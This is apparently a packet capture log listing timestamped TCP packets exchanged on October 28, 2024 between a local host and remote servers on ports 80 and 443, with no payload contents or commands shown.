                                                                                                                                                              Oct 28, 2024 19:46:17.708314896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708348989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708367109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709019899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709054947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709072113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709086895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709120989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709131956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709155083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709188938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709198952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709970951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710006952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710020065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710041046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710073948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710104942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710107088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710141897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710165024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710916996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710951090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710961103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710984945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.711038113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.742559910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.877283096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.882855892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.899132013 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:17.899159908 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039475918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039623976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039720058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.039752960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039788008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039823055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039841890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040219069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040250063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040283918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040296078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040317059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040335894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040652990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040685892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040710926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040720940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040776014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041218996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041253090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041286945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041304111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041321039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041354895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041377068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041974068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042007923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042033911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042042017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042093039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042108059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042774916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042812109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042829037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042846918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042880058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042897940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042918921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042968035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.043564081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.043600082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.043649912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.043669939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.043687105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.043720007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.043737888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.044387102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.044423103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.044456005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.044457912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.044490099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.044521093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.044523954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.044573069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.045195103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.045232058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.045267105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.045300961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.045331001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.045362949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.045965910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046004057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046053886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046061039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.046088934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046122074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046143055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.046643972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046703100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046708107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.046740055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046773911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046804905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.046823978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046859026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046880007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.046892881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.046947956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.047522068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.047558069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.047616005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.090073109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090147972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090183020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090217113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.090409040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090465069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.090640068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090673923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090728998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090732098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.090764046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.090820074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.091239929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.091274977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.091308117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.091355085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.091356993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.091388941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.091412067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.092052937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092087030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092107058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.092120886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092154980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092174053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.092189074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092223883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092243910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.092890024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092924118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.092942953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.092958927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093014002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.093368053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093420029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093452930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093472004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.093487024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093521118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.093553066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.094187021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094219923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094242096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.094254971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094289064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094304085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.094322920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094357967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.094376087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.095042944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095076084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095108986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.095109940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095144987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095166922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.095177889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095227957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.095884085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095918894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095952988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.095976114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.095987082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096019030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096034050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.096055031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096107006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.096580982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096632004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096664906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096695900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.096698999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096731901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.096755028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.097409010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097464085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097464085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.097500086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097533941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097548962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.097564936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097599983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.097624063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.098069906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.098105907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.098121881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.098140001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.098207951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.100267887 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.158366919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158473969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158509970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158545017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.158649921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158705950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.158791065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158824921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158874035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.158946037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.158981085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159015894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159039974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.159265041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159300089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159356117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.159357071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159410954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.159673929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159708977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159769058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159769058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.159806013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.159859896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.160254955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160306931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160341024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160362959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.160376072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160412073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160427094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.160446882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160495996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161240101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161278009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161310911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161334038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161346912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161381960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161406040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161415100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161448956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161464930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161950111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161983967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162005901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.162035942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162071943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162096977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.162123919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162157059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162174940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.163678885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.163743019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.163841963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.163981915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164017916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164037943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.164123058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164175034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.164271116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164308071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164361954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166256905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166294098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166327000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166348934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166362047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166413069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166426897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166461945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166496038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166516066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166528940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166562080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166601896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166630030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166663885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166687965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166697025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166731119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166749001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166765928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166800022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166815042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166836023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166866064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166883945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166899920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166933060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166951895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166966915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167001009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167013884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167406082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167439938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167468071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167593956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167629004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167646885 CET4972680192.168.2.16166.1.160.211
